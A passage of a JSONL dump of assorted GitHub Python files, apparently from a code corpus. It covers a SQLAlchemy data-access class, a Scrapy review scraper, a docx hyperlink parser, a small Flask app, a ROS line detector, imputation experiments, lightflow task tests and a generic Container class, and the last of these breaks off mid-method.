+{"seq_id":"16382869986","text":"from DBase import Conexion\nfrom DBase import Tablas\nfrom sqlalchemy import and_\n\nclass ShowDB:\n def __init__(self):\n self.con = Conexion.conexion()\n\n def alta(self,show):\n try:\n show.cantidadPuntuaciones=0\n show.puntuacionUsuariosAcumulada=0\n self.con.session.add(show)\n self.con.session.commit()\n return True\n except Exception as e:\n print(\"No se pudo dar de alta el show: \"+e)\n self.con.session.rollback()\n return False\n\n def listarShowsPorID(self,shows):\n showsEnc=[]\n for i in shows:\n show=self.con.session.query(Tablas.Show).filter(and_(Tablas.Show.idShow == i.idshow,Tablas.Show.tipo==i.tipo)).first()\n show.estado=i.estado\n show.puntuado=i.puntuado\n showsEnc.append(show)\n return showsEnc\n\n def buscarShowPorID(self,id):\n try:\n show=self.con.session.query(Tablas.Show).filter(Tablas.Show.idShow == id.idShow).first()\n return show\n except Exception as e:\n return None\n\n def buscarShowPorIdyTipo(self,show):\n try:\n show=self.con.session.query(Tablas.Show).filter(and_(Tablas.Show.idShow == show.idShow,Tablas.Show.tipo==show.tipo)).first()\n return show\n except Exception as e:\n return None\n\n def listarShows(self):\n shows = self.con.session.query(Tablas.Show).all()\n if(len(shows) == 0):\n self.con.session.close()\n return False\n else:\n self.con.session.close()\n return shows\n\n\n def puntuarShow(self,show):\n try:\n sho=self.con.session.query(Tablas.Show).filter(and_(Tablas.Show.idShow == show.idShow,Tablas.Show.tipo == show.tipo)).first()\n sho.puntuacionUsuariosAcumulada=sho.puntuacionUsuariosAcumulada+show.puntuacionUsuariosAcumulada\n sho.cantidadPuntuaciones=sho.cantidadPuntuaciones+1\n self.con.session.add(show)\n self.con.session.commit()\n return True\n except Exception as e:\n print(\"No se pudo dar de puntear el show: \"+e)\n self.con.session.rollback()\n return False\n","repo_name":"Faviobrntn/tpFinalSoporte","sub_path":"DBase/ShowDB.py","file_name":"ShowDB.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"10346184580","text":"\"\"\"\nCreated on July 6, 2020\nby Anthony Drake\n\"\"\"\n\nimport json\nimport scrapy\nfrom scrapy.spiders import Spider\nfrom ..items import TheneedledropItem\n\nclass needledropspider(Spider):\n name = 'theneedledrop'\n start_urls = ['https://www.theneedledrop.com/articles?category=Reviews']\n\n def parse(self, response):\n\n urls = response.xpath('//div[@class=\"blog-content\"]/article/header/h1/a/@href').getall()\n\n for u in urls:\n yield scrapy.Request(response.urljoin(u), self.parse_detail)\n\n next_url = response.urljoin(response.xpath('//div[@class=\"older\"]/a/@href').get())\n if next_url:\n yield scrapy.Request(url=next_url, callback=self.parse)\n\n def parse_detail(self, response):\n\n script = response.xpath('//script[@type=\"application/ld+json\"]/text()')[2].get()\n desc = json.loads(script)\n items = TheneedledropItem()\n items['url'] = desc['url']\n items['date'] = desc['datePublished']\n try:\n items['artist'] = desc['headline'].split('-')[0].strip()\n items['album'] = desc['headline'].split('-')[1].strip()\n finally:\n items['name'] = desc['headline']\n\n try:\n \titems['score'] = response.xpath('//a[contains(text(),\"/\")]/text()').get().split('/')[0]\n except:\n \titems['score'] = \"N/A\"\n\n\n items['tags'] = \" | \".join(response.xpath('//*[@class=\"entry-tags\"]/a/text()').getall())\n yield items\n","repo_name":"AntEDra/theNeedleDrop","sub_path":"TNDReviews/TNDReviews/spiders/theNeedleDropSpider.py","file_name":"theNeedleDropSpider.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25527815501","text":"from lxml.etree import _Element\nfrom docx.opc.rel import _Relationship\nfrom docx.text.paragraph import Paragraph\n\nfrom .VText import VText\n\n\nclass VHyperlink(VText):\n def __init__(self, hyperlink: _Element = None, paragraph: Paragraph = None):\n \"\"\"\n Class for links in docx\n :param hyperlink: element from paragraph\n :param paragraph: any paragraph from document to get url of link while parsing\n \"\"\"\n super(VHyperlink, self).__init__()\n self.url = \"\"\n self.raw = hyperlink\n if hyperlink is not None:\n self.parse(hyperlink, paragraph)\n\n def __str__(self):\n if self.text.endswith(\" \"):\n return f\"[{self.text[:-1]}]( {self.url} ) \"\n else:\n return f\"[{self.text}]( {self.url} )\"\n\n def to_html(self):\n \"\"\"\n Get html representation\n :return: html representation\n \"\"\"\n if len([x for x in self.url if x == \"(\" or x == \")\"]) == 0:\n if self.text.endswith(\" \"):\n return f\"{{{self.text[:-1]}}}({self.url}) \"\n else:\n return f\"{{{self.text}}}({self.url})\"\n else:\n warning = \"\"\n if self.glue_warning: # should be set if something is wrong with typograph\n warning = ' class=\"verstak_glue_warning\"'\n if self.text.endswith(\" \"):\n return f'{self.text[:-1]} '\n else:\n return f'{self.text}'\n\n def parse(self, hyperlink: _Element, paragraph: Paragraph):\n \"\"\"\n Parse element from docx paragraph\n :param hyperlink: element from docx paragraph\n :param paragraph: any paragraph with parent as document to get urls from\n :return: Markdown representation\n \"\"\"\n url_id = None\n if len(hyperlink.values()) > 0:\n url_id = hyperlink.values()[0]\n url: _Relationship = paragraph.part.rels[url_id]\n self.url = url.target_ref\n self.text = hyperlink[0].text\n self.raw = hyperlink\n return str(self)\n","repo_name":"REW1L/verstak","sub_path":"verstak_parser/VHyperlink.py","file_name":"VHyperlink.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"19815253499","text":"import secret\n\nfrom flask import Flask, render_template, jsonify, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/start', methods=['GET'])\ndef show_total():\n total = list(secret.db.users.aggregate([\n {'$group':\n {\n '_id': 'null',\n 'total': {'$sum': '$count'}\n }}\n ]))\n for count in total:\n return jsonify({'total': count})\n\n\n@app.route('/test', methods=['GET'])\ndef test_html():\n return render_template('test.html')\n\n\n@app.route('/quest', methods=['GET'])\ndef get_test():\n question = list(secret.db.questions.find({}, {'_id': False}))\n return jsonify({'quest': question})\n\n\n@app.route('/result/', methods=['GET'])\ndef get_param(mbti):\n data = secret.db.types.find_one({'type': mbti}, {'_id': False})\n # secret.db.users.update_one({'type': mbti}, {'$inc': {'count': 1}}) 패치........ㅎ......\n return jsonify({\"data\": data})\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return \"페이지가 없습니다. URL를 확인 하세요\", 404\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)\n","repo_name":"Haze-S/bbr-test","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"25512883400","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport cv2, cv_bridge\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Image\n\nclass StopLine(object):\n def __init__(self):\n rospy.init_node(\"StopLine\")\n self.bridge = cv_bridge.CvBridge()\n cv2.namedWindow(\"Predator\", 1)\n\n rospy.Subscriber('camera2/usb_cam2/image_raw', Image, self._latestImage)\n\n self.pub = rospy.Publisher(\"/cmd_vel\", Twist, queue_size=3)\n\n self.person_distance = 1.1\n self.last_cmd_linear_x = 0\n self.last_state = 0\n self.line_detected = 0\n self.time_start = rospy.Time.now()\n\n rospy.loginfo(\"Ready to get out there and stop at the horizontal lines!\")\n rospy.spin()\n\n def _latestImage(self, data):\n kernelOpen=np.ones((5,5))\n kernelClose=np.ones((20,20))\n font=cv2.cv.InitFont(cv2.cv.CV_FONT_HERSHEY_SIMPLEX,2,0.5,0,3,1)\n image = self.bridge.imgmsg_to_cv2(data, desired_encoding='bgr8')\n dark_blue = np.array([150,90,50])\n bright_blue = np.array([255,150,100])\n mask = cv2.inRange(image, dark_blue, bright_blue)\n\n (height, width, depth) = image.shape\n\n # Threshold the HSV image to get only blue colors\n mask = cv2.inRange(image, dark_blue, bright_blue)\n mask[0:400, 0:width] = 0\n mask[460:height, 0:width] = 0\n mask[400:460, 0:220] = 0\n mask[400:460, 420:width] = 0\n \n #Morphology\n maskOpen=cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernelOpen)\n maskClose=cv2.morphologyEx(maskOpen,cv2.MORPH_CLOSE,kernelClose)\n maskFinal=maskClose\n conts,h=cv2.findContours(maskFinal.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n\n #cv2.drawContours(dilation,conts,-1,(0,0,255),3)\n #line_number = 0\n for i in range(len(conts)):\n x,y,w,h=cv2.boundingRect(conts[i])\n if w*h > 3000:\n #line_number = line_number\n cv2.rectangle(image,(x,y),(x+w,y+h),(0,0,255), 2)\n self.line_detected = 1\n #cv2.cv.PutText(cv2.cv.fromarray(image), str(i+1),(x,y+h),font,(0,255,255))\n else:\n self.line_detected = 0\n cv2.imshow(\"CAM_RIGHT\", image)\n cv2.imshow(\"mask\", mask)\n cv2.waitKey(2)\n \n if self.last_state - self.line_detected > 0:\n self.time_start = rospy.Time.now()\n rospy.loginfo(self.last_state - self.line_detected)\n cmd = Twist()\n #if rospy.Time.now() - self.time_start < rospy.Duration.from_sec(2):\n # cmd.linear.x = 0\n #else:\n # cmd.linear.x = 0.12\n self.pub.publish(image[:,:,1])\n self.last_state = self.line_detected\n\nif __name__ == \"__main__\":\n try:\n run = StopLine()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"apetsiuk/Raccoon","sub_path":"quad_pkg/src/scripts/stop_line.py","file_name":"stop_line.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37997334806","text":"# advent of code 2022 day 9\nimport numpy as np\n\nwith open('day9.txt') as f:\n data = f.read().splitlines()\n\n\ndef uniqueSpotsTraveled(data):\n\n visited = set()\n visited.add((0, 0)) # starting with head\n uniqueSpots = 0\n head = np.array([0, 0])\n tail = np.array([0, 0])\n\n for i in range(len(data)):\n [direction, steps] = data[i].split()\n steps = int(steps)\n\n if direction == 'L':\n if (isTouching(head, tail)):\n visited.add(tail)\n else: # need to move tail\n pass\n\nuniqueSpotsTraveled(data)\n\ndef isTouching(head, tail):\n adjacentSpots = [np.array([1, 0]), np.array([0, 1]), np.array(\n [-1, 0]), np.array([0, -1]), np.array([1, 1]), np.array([-1, -1]), np.array([0, 0]), np.array([1, -1])]\n\n if np.subtract(head, tail) in adjacentSpots:\n return True\n\n# print(np.subtract(np.array([4, 1]), (np.array([2, 9]))))\n","repo_name":"AlexHappyCode/AdventOfCode2022","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14701391421","text":"import numpy\nfrom util.util import save_dataset_to_file, load_csv_file_into_variable, calculate_RMSE\nfrom soft_impute_impl.soft_impute import SoftImpute\nfrom sklearn.metrics import mean_absolute_error\nfrom pathlib import Path\nfrom decimal import *\n\n\nall_rmse = []\nall_mae = []\nall_pcorr = []\n\ndef generate_mask(number_of_weeks_with_known_data, test_students_ids):\n train_mask1 = generate_mask_for_known_part_of_the_semester(number_of_weeks_with_known_data)\n train_mask2 = generate_mask_for_unknown_part_of_the_semester(22 - number_of_weeks_with_known_data, test_students_ids)\n mask = numpy.append(train_mask1, values=train_mask2, axis=1)\n return mask\n\n# Function for generating first part of the mask - known data\n# Parameters: int-> number of weeks with known data\n# Returns: array -> first part of the mask\ndef generate_mask_for_known_part_of_the_semester(number_of_weeks_with_known_data):\n return numpy.full(shape=(439, number_of_weeks_with_known_data*20), fill_value=False)\n\n# Function for generating the second part of the mask that contains some missing values\n# Parameters: int -> number of weeks with some missing data\n# Returns: array -> second part of the mask, contains True for test student ids, and False for other students\ndef generate_mask_for_unknown_part_of_the_semester(number_of_weeks_with_missing_data, test_students_ids):\n mask = numpy.full(shape=(439, number_of_weeks_with_missing_data*20), fill_value=False)\n for test_student_id in test_students_ids:\n # For this student id, set all values for the last weeks that are missing to True\n mask[test_student_id, :] = True\n return mask\n\n\ndef generate_train_dataset(dataset, test_students_ids, number_of_weeks_with_known_data):\n mask = generate_mask(number_of_weeks_with_known_data, test_students_ids)\n train_dataset = numpy.copy(dataset)\n train_dataset[mask] = numpy.nan\n return train_dataset\n\ndef perform_soft_iterative_imputation(train_dataset, number_of_weeks_with_known_data, percentage_of_students_missing, test_student_ids, dataset, test_case_nr):\n clf = SoftImpute()\n clf.fit(dataset)\n train_dataset_after_soft_imputation = clf.predict(train_dataset)\n\n # Get predicted and real values \n predicted_values = []\n real_values = []\n for test_student_id in test_student_ids:\n # Predicted values are values on same positions as real but from the transformed dataset\n predicted_values.append(train_dataset_after_soft_imputation[test_student_id, number_of_weeks_with_known_data*20:])\n # Real values are values from the original matrix on positions \n # row = test student id \n # column = all starting from number_of_weeks_with_known_data*20 until the end\n real_values.append(dataset[test_student_id, number_of_weeks_with_known_data*20:])\n predicted_values = numpy.asarray(predicted_values)\n save_dataset_to_file(predicted_values, 'results/test-case-' + test_case_nr +'/'+ percentage_of_students_missing + 'p-students-missing/svd-based/predicted-values.csv')\n\n # Round predicted values\n predicted_values_rounded = numpy.copy(predicted_values)\n for i in range(0, predicted_values_rounded.shape[0]):\n predicted_values_rounded[i, :] = list(map(lambda x : abs(float(round(Decimal(str(x)), 0))), predicted_values_rounded[i, :]))\n \n save_dataset_to_file(predicted_values_rounded, 'results/test-case-' + test_case_nr +'/'+ percentage_of_students_missing + 'p-students-missing/svd-based/predicted-values-rounded.csv')\n real_values = numpy.asarray(real_values)\n save_dataset_to_file(real_values, 'results/test-case-' + test_case_nr +'/'+ percentage_of_students_missing + 'p-students-missing/svd-based/real-values.csv')\n\n rmse_ice = calculate_RMSE(real_values.ravel(), predicted_values_rounded.ravel())\n print('Test case ' , test_case_nr, \".\", percentage_of_students_missing)\n print(\"RMSE: {:.4f}\".format(rmse_ice))\n all_rmse.append(rmse_ice)\n mae = mean_absolute_error(real_values.ravel(), predicted_values_rounded.ravel())\n print(\"MAE: {:.4f}\".format(mae))\n all_mae.append(mae)\n pcorr = numpy.corrcoef(real_values.ravel(), predicted_values.ravel())[0, 1]\n print(\"PCORR on test set: {:.4f}\".format(pcorr))\n all_pcorr.append(pcorr)\n\n\n\ndef main():\n # Define ROUND_HALF_UP as rounding strategy\n getcontext().rounding = ROUND_HALF_UP\n\n known_weeks_test_cases = [11, 8, 5, 3]\n test_case_nr = 1\n for number_of_weeks_with_known_data in known_weeks_test_cases:\n print(\"---- Starting soft iterative imputation for \", number_of_weeks_with_known_data, \" known weeks\")\n for percentage_of_students_missing in [\"30\", \"60\", \"90\"]:\n print(percentage_of_students_missing, \" % missing \")\n # Create directories for saving results\n Path(\"results/test-case-\" + str(test_case_nr) + \"/\" + percentage_of_students_missing + \"p-students-missing/svd-based\").mkdir(parents=True, exist_ok=True)\n\n test_student_ids = load_csv_file_into_variable('../results/test-student-ids-' + percentage_of_students_missing + '.csv')[0]\n test_student_ids = numpy.asarray(test_student_ids, dtype='int64')\n # Load dataset that is in form of a 2D matrix of size (nr_of_students, nr_of_errors*nr_of_weeks) -> (439, 440)\n dataset = load_csv_file_into_variable('../dataset/dataset-2d-matrix.csv')\n train_dataset = generate_train_dataset(dataset, test_student_ids, number_of_weeks_with_known_data)\n save_dataset_to_file(train_dataset, 'results/test-case-' + str(test_case_nr) +'/' + percentage_of_students_missing + 'p-students-missing/svd-based/train-dataset.csv')\n perform_soft_iterative_imputation(train_dataset, number_of_weeks_with_known_data, percentage_of_students_missing, test_student_ids, dataset, str(test_case_nr))\n test_case_nr += 1\n \n print(\"RMSE: \", list(map(lambda x : abs(float(round(Decimal(str(x)), 4))), all_rmse)))\n print(\"MAE: \", list(map(lambda x : abs(float(round(Decimal(str(x)), 4))), all_mae)))\n print(\"PCOR: \", list(map(lambda x : abs(float(round(Decimal(str(x)), 4))), all_pcorr)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kamberovicmubina/learning-programmers-profile","sub_path":"methods/svd_based.py","file_name":"svd_based.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"11934535345","text":"from unittest.mock import Mock, create_autospec, call\n\nimport pytest # noqa\n\nfrom lightflow.models.task import BaseTask, TaskState, TaskStatus\nfrom lightflow.queue import DefaultJobQueueName\nfrom lightflow.models.task_data import MultiTaskData\nfrom lightflow.models.exceptions import AbortWorkflow, StopTask, TaskReturnActionInvalid\nfrom lightflow.models.action import Action\n\n\n@pytest.fixture\ndef task():\n yield BaseTask('task-name')\n\n\nclass CeleryResultMock:\n def __init__(self, *, state=None, ready=False, failed=False):\n self.state = state\n self._ready = ready\n self._failed = failed\n self._forget_called = False\n\n def ready(self):\n return self._ready\n\n def failed(self):\n return self._failed\n\n def forget(self):\n self._forget_called = True\n\n\ndef test_base_task_properties(task):\n assert task.name == 'task-name'\n assert task.state == TaskState.Init\n assert task.queue == DefaultJobQueueName.Task\n assert task.has_to_run is False\n assert task.propagate_skip is True\n assert task.is_waiting is False\n assert task.is_running is False\n assert task.is_completed is False\n assert task.is_stopped is False\n assert task.is_aborted is False\n assert task.is_skipped is False\n assert task.celery_pending is False\n assert task.celery_completed is False\n assert task.celery_failed is False\n assert task.celery_state == 'NOT_QUEUED'\n assert task.has_celery_result is False\n\n\ndef test_base_task_skipped_setter(task):\n task.is_skipped = True\n assert task.is_skipped is True\n\n\ndef test_base_task_state_setter(task):\n task.state = TaskState.Waiting\n assert task.state == TaskState.Waiting\n\n\ndef test_base_task_celery_pending(task):\n task.celery_result = CeleryResultMock(state='PENDING')\n assert task.celery_pending is True\n\n\ndef test_base_task_celery_completed(task):\n task.celery_result = CeleryResultMock(ready=True)\n assert task.celery_completed is True\n\n\ndef test_base_task_celery_failed(task):\n task.celery_result = CeleryResultMock(failed=True)\n assert task.celery_failed is True\n\n\ndef test_base_task_celery_state(task):\n task.celery_result = CeleryResultMock(state='PENDING')\n assert task.celery_state == 'PENDING'\n\n\ndef test_base_task_clear_result(task):\n celery_result = CeleryResultMock()\n task.celery_result = celery_result\n task.clear_celery_result()\n assert celery_result._forget_called is True\n\n\ndef test_run_calls_callbacks(data_mock, store_mock, signal_mock, context_mock):\n init_cb = Mock()\n finally_cb = Mock()\n success_cb = Mock()\n stop_cb = Mock()\n abort_cb = Mock()\n task = BaseTask('task-name', callback_init=init_cb, callback_finally=finally_cb)\n task._run(data_mock, store_mock, signal_mock, context_mock,\n success_callback=success_cb, stop_callback=stop_cb, abort_callback=abort_cb)\n assert init_cb.call_args == call(data_mock, store_mock, signal_mock, context_mock)\n assert finally_cb.call_args == call(TaskStatus.Success, data_mock, store_mock, signal_mock, context_mock)\n assert success_cb.called is True\n assert stop_cb.called is False\n assert abort_cb.called is False\n\n\ndef test_run_calls_callback_finally_on_error(data_mock, store_mock, signal_mock, context_mock):\n\n class FailingTask(BaseTask):\n def run(self, *args, **kwargs):\n raise Exception()\n\n finally_cb = Mock()\n success_cb = Mock()\n stop_cb = Mock()\n abort_cb = Mock()\n task = FailingTask('task-name', callback_finally=finally_cb)\n with pytest.raises(Exception):\n task._run(data_mock, store_mock, signal_mock, context_mock,\n success_callback=success_cb, stop_callback=stop_cb,\n abort_callback=abort_cb)\n assert finally_cb.call_args == call(TaskStatus.Error, data_mock, store_mock, signal_mock, context_mock)\n assert success_cb.called is False\n assert stop_cb.called is False\n assert abort_cb.called is False\n\n\ndef test_run_calls_callback_finally_on_stop_task(data_mock, store_mock, signal_mock, context_mock):\n\n class StoppingTask(BaseTask):\n def run(self, *args, **kwargs):\n raise StopTask()\n\n finally_cb = Mock()\n success_cb = Mock()\n stop_cb = Mock()\n abort_cb = Mock()\n task = StoppingTask('task-name', callback_finally=finally_cb)\n task._run(data_mock, store_mock, signal_mock, context_mock,\n success_callback=success_cb, stop_callback=stop_cb, abort_callback=abort_cb)\n assert finally_cb.call_args == call(TaskStatus.Stopped, data_mock, store_mock, signal_mock, context_mock)\n assert success_cb.called is False\n assert stop_cb.called is True\n assert abort_cb.called is False\n\n\ndef test_run_calls_callback_finally_on_abort_workflow(data_mock, store_mock, signal_mock, context_mock):\n\n class AbortingTask(BaseTask):\n def run(self, *args, **kwargs):\n raise AbortWorkflow()\n\n finally_cb = Mock()\n success_cb = Mock()\n stop_cb = Mock()\n abort_cb = Mock()\n task = AbortingTask('task-name', callback_finally=finally_cb)\n task._run(data_mock, store_mock, signal_mock, context_mock,\n success_callback=success_cb, stop_callback=stop_cb, abort_callback=abort_cb)\n assert finally_cb.call_args == call(TaskStatus.Aborted, data_mock, store_mock, signal_mock, context_mock)\n assert success_cb.called is False\n assert stop_cb.called is False\n assert abort_cb.called is True\n\n\ndef test_run_handles_invalid_result(data_mock, store_mock, signal_mock, context_mock):\n\n class InvalidResultTask(BaseTask):\n def run(self, *args, **kwargs):\n return 'whoops'\n\n with pytest.raises(TaskReturnActionInvalid):\n InvalidResultTask('task-name')._run(data_mock, store_mock, signal_mock, context_mock)\n\n\ndef test_run_handles_action_response(data_mock, store_mock, signal_mock, context_mock):\n\n run_result = Action(create_autospec(MultiTaskData, instance=True))\n\n class Task(BaseTask):\n def run(self, *args, **kwargs):\n return run_result\n\n result = Task('task-name')._run(data_mock, store_mock, signal_mock, context_mock)\n assert result == run_result\n\n\ndef test_run_handles_no_data(store_mock, signal_mock, context_mock):\n result = BaseTask('task-name')._run(None, store_mock, signal_mock, context_mock)\n assert result.data is not None\n","repo_name":"AustralianSynchrotron/lightflow","sub_path":"tests/test_base_task.py","file_name":"test_base_task.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"3"}
+{"seq_id":"35384486525","text":"import json\nfrom typing import List\nimport requests\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom domain import FinantialStatements\nfrom api.type import AddFinantialStatementsRequstType\n\nHOST = os.getenv(\"TOKO_HOST\")\nPORT = os.getenv(\"TOKO_PORT\")\n\ndef addFinantialStatements(props: AddFinantialStatementsRequstType, isPrintLog: bool = False) -> FinantialStatements:\n url = \"{}:{}/company/{}/finantial\".format(HOST, PORT, props[\"companyID\"])\n result = requests.post(url, json=({\"props\": props}))\n finantialStatements: FinantialStatements = json.loads(result.content.decode('utf-8'))\n if isPrintLog:\n print(\"[addFinantialStatements] result: {}\".format(finantialStatements))\n\n return finantialStatements\n\ndef getFinantialStatementsList(companyID: int, isPrintLog: bool = False) -> List[FinantialStatements]:\n url = \"{}:{}/company/{}/finantial\".format(HOST, PORT, companyID)\n result = requests.get(url)\n finantialStatementsList: List[FinantialStatements] = json.loads(result.content.decode('utf-8'))\n if isPrintLog:\n print(\"[getFinantialStatementsList] result: {}\".format(finantialStatementsList))\n return finantialStatementsList\n\n\ndef getFinantialStatements(companyID: int, finantialID: int, isPrintLog: bool = False) -> FinantialStatements:\n url = \"{}:{}/company/{}/finantial/{}\".format(HOST, PORT, companyID, finantialID)\n result = requests.get(url)\n finantialStatements: FinantialStatements = json.loads(result.content.decode('utf-8'))\n if isPrintLog:\n print(\"[getFinantialStatements] result: {}\".format(finantialStatements))\n return finantialStatements\n\n\nif __name__ == \"__main__\":\n # addFinantialStatements(\"test\", 1, 3)\n # getFinantialStatements(1)\n getFinantialStatementsList(1)\n","repo_name":"ruritoBlogger/Ange","sub_path":"src/api/finantialStatements.py","file_name":"finantialStatements.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32772617654","text":"import torch\nimport sys\nimport numpy as np\nimport Utility as util\n\n\nclass Container:\n\n partition_sep = \"__\"\n path_sep = \":\"\n reserved_names = [\"partitions\"]\n debug = 0\n\n # Public alias method for set()\n def s(self, name, value, partition=None, path=None):\n return self.set(name, value, partition, path)\n\n # Public set method: implements all macro set operations\n def set(self, name, value, partition=None, path=None, multi_value=False):\n # set multiple values\n if multi_value and isinstance(value, list):\n # different name and partition for each value\n if isinstance(name, list) and isinstance(partition, list):\n if len(name) != len(value) or len(name) != len(partition):\n raise ValueError(\"Name, value and partition lists must be equal length\")\n for _name, _value, _partition in zip(name, value, partition):\n self.__set(_name, _value, _partition, path)\n # different name but same or no partition for each value\n elif isinstance(name, list):\n if len(name) != len(value):\n raise ValueError(\"Name and value lists must be equal length\")\n for _name, _value in zip(name, value):\n self.__set(_name, _value, partition, path)\n # same name but different partition for each value\n elif isinstance(partition, list):\n if len(partition) != len(value):\n raise ValueError(\"Partition and value lists must be equal length\")\n for _value, _partition in zip(value, partition):\n self.__set(name, _value, _partition, path)\n else:\n raise NotImplementedError()\n # set single value for a single var under a single partition\n elif not isinstance(name, list) and not isinstance(partition, list):\n self.__set(name, value, partition, path)\n # set single value for multiple vars under multiple partitions\n elif isinstance(name, list) and isinstance(partition, list):\n if len(name) != len(partition):\n raise ValueError(\"Name and partition lists must be equal length\")\n for _name, _partition in zip(name, partition):\n self.__set(_name, value, _partition, path)\n # set single value for multiple vars under one or no partition(s)\n elif isinstance(name, list):\n for _name in name:\n self.__set(_name, value, partition, path)\n # set single value for single var under multiple partitions\n elif isinstance(partition, list):\n for _partition in partition:\n self.__set(name, value, _partition, path)\n else:\n raise NotImplementedError()\n return self\n\n # Private set method: implements the mapping of a variable's name to its value\n # Sets a var called by \"name\", under partition \"partition\", at descendant container \"path\" to the value \"value\"\n def __set(self, name, value, partition=None, path=None):\n self.validate_types(name, value, partition, path)\n assert not self.is_reserved(name), \"Attempting to set value for reserved name \\\"%s\\\"\" % (name)\n con = self.get_container(path, True)\n if partition == \"*\":\n for _name, _value, _partition in self.get_name_value_partitions(False):\n if name == _name:\n con.__set(_name, value, _partition)\n return self\n key = self.create_key(name, partition)\n con.update_partitions(partition)\n previous = None\n if con.key_exists(key):\n previous = con.get(name, partition)\n con.__dict__[key] = value\n return previous\n\n # Public alias method for get()\n def g(self, name, partition=None, path=None, recurse=False, must_exist=True):\n return self.get(name, partition, path, recurse, must_exist)\n\n # Public get method: implements all macro get operations\n def get(self, name, partition=None, path=None, recurse=False, must_exist=True):\n # get single value of a single var under a single partition\n if not isinstance(name, list) and not isinstance(partition, list):\n return self.__get(name, partition, path, recurse, must_exist)\n # get values of multiple vars under multiple partitions\n elif isinstance(name, list) and isinstance(partition, list):\n if len(name) != len(partition):\n raise ValueError(\"Name and partition lists must be equal length\")\n\n return [self.__get(_name, _partition, path, recurse, must_exist) for _name, _partition in zip(name, partition)]\n # get values of multiple vars under one or no partition(s)\n elif isinstance(name, list):\n return [self.__get(_name, partition, path, recurse, must_exist) for _name in name]\n # get values of single var under multiple partitions\n elif isinstance(partition, list):\n return [self.__get(name, _partition, path, recurse, must_exist) for _partition in partition]\n else:\n raise NotImplementedError()\n\n # Private get method: implements retrieval of a variable's value\n # Gets the value of var called by \"name\", under partition \"partition\", at descendant container \"path\"\n def __get(self, name, partition=None, path=None, recurse=False, must_exist=True):\n self.validate_types(name, None, partition, path)\n con = self.get_container(path)\n if partition == \"*\":\n value_partition_pairs = []\n for _name, _value, _partition in con.get_name_value_partitions(False):\n if name == _name:\n value_partition_pairs += [[_value, _partition]]\n return value_partition_pairs\n key = self.create_key(name, partition)\n if not con.key_exists(key):\n val = None\n if recurse:\n for key, value in self.get_key_values():\n if isinstance(value, Container):\n val = value.get(name, partition, recurse=True, must_exist=False)\n if not val is None:\n break\n if val is None and must_exist:\n raise ValueError(\"Key \\\"%s\\\" does not exist in this Container\" % (key))\n else:\n return val\n return con.__dict__[key]\n\n # Public alias method for rem()\n def r(self, name, partition=None, path=None, recurse=False, must_exist=True):\n return self.rem(name, partition, path, recurse, must_exist)\n\n # Public remove method: implements all macro remove operations\n def rem(self, name, partition=None, path=None, recurse=False, must_exist=True):\n # remove a single var under a single partition\n if not isinstance(name, list) and not isinstance(partition, list):\n return self.__rem(name, partition, path, recurse, must_exist)\n # remove multiple vars under multiple partitions\n elif isinstance(name, list) and isinstance(partition, list):\n if len(name) != len(partition):\n raise ValueError(\"Name and partition lists must be equal length\")\n\n return [self.__rem(_name, _partition, path, recurse, must_exist) for _name, _partition in zip(name, partition)]\n # remove multiple vars under one or no partition(s)\n elif isinstance(name, list):\n return [self.__rem(_name, partition, path, recurse, must_exist) for _name in name]\n # remove single var under multiple partitions\n elif isinstance(partition, list):\n return [self.__rem(name, _partition, path, recurse, must_exist) for _partition in partition]\n else:\n raise NotImplementedError()\n\n # Private remove method: implements deletion of a variable\n # Deletes a var called by \"name\", under partition \"partition\", at descendant container \"path\"\n def __rem(self, name, partition=None, path=None, recurse=False, must_exist=True):\n self.validate_types(name, None, partition, path)\n con = self.get_container(path)\n if partition == \"*\":\n partitions = []\n for _name, _value, _partition in con.get_name_value_partitions(False):\n if name == _name:\n partitions += [_partition]\n for _partition in partitions:\n con.__rem(name, _partition, path, recurse, must_exist)\n return self\n key = self.create_key(name, partition)\n if not con.key_exists(key):\n if recurse:\n for key, value in con.get_key_values():\n if isinstance(value, Container):\n value.__rem(name, partition, recurse, must_exist)\n if must_exist:\n raise ValueError(\"Key \\\"%s\\\" does not exist in this Container\" % (key))\n else:\n del con.__dict__[key]\n return self\n\n def has(self, name, partition=None, path=None, recurse=True):\n con = self.get_container(path)\n if not recurse:\n return self.create_key(name, partition) in con\n return con.__has(name, partition)\n\n def __has(self, name, partition=None):\n checks = [self.create_key(name, partition) in self]\n for _name, value, _partition in self.get_name_value_partitions(sort=False):\n if isinstance(value, Container):\n checks.append(value.__has(name, partition))\n return 